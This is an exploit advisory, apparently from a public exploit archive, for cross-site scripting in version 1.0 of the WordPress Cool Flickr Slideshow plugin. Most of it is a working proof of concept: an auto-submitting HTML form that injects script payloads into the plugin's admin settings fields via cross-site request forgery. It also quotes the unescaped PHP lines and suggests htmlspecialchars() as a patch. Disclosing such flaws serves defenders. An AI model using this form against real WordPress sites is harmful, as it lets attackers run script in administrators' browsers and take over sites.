WordPress Cool Flickr Slideshow 1.0 Cross Site Scripting
Posted on 07 September 2017
___________________________________________________ | | Exploit Title: Wordpress cool-flickr-slideshow Plugin Cross Site Scripting(xss) | Exploit Author: Ashiyane Digital security Team | Vendor Homepage:https://wordpress.org/plugins/cool-flickr-slideshow/ | Software Link: https://downloads.wordpress.org/plugin/cool-flickr-slideshow.1.0.zip | Version: 1.0 | Date: 2017 - 07 - 9 | Tested on: Kali-Linux /FireFox |__________________________________________________ Exploit : <form name="form1" method="POST" Action="http://127.0.0.1/wordpress/wp-admin/admin.php?page=flickr-gallery-settings"> <input type="hidden" name="flickr-gallery_hidden" value="Y" /> <input type="hidden" name="flickr_type" value=""><script>alert("xss1")</script>" /> <input type="hidden" name="flickr_uid" value="1" /> <input type="hidden" name="flickr_api" value="MMM" /> <input type="hidden" name="flickr_groupid" value='1' /> <input type="hidden" name="flickr_set" value="" /> <input type="hidden" name="flickr_width" value='"><script>alert("xss 2")</script>' /> <input type="hidden" name="flickr_height" value='"><script>alert("xss 3")</script>' /> <input type="hidden" name="Submit" value="Save" /> </form> <script language="javascript"> setTimeout('form1.submit()', 1); </script> __________________________________________________ Vulnerable File : /wp-content/plugins/cool-flickr-slideshow/flickr_gallery_admin.php Vulnerable code: line 154 : <select id="flickr_type" name="flickr_type" onchange="javascript:ChangeFlickrType(this.value);"> <option selected="" value=""/><script>alert(1000)</script>">SELECT</option> A A <option value="user">User</option>A A A A <option value="group">Group</option> A A <option value="set">Set</option> A A <option value="api">API</option> A A A </select> line 185 : <p><span style="width: 75px;float: left;"><?php _e("Width: " ); ?> </span><input type="text" name="flickr_width" value="<?php echo $flickr_width; ?>" size="20"></p> line 186 : <p><span style="width: 75px;float: left;"><?php _e("Height: " ); ?> </span><input type="text" name="flickr_height" value="<?php echo $flickr_height; ?>" size="20"></p> __________________________________________________ #patch: For fix this vulnerability you use htmlspecialchars() function . __________________________________________________ Discovered By : M.R.S.L.Y __________________________________________________
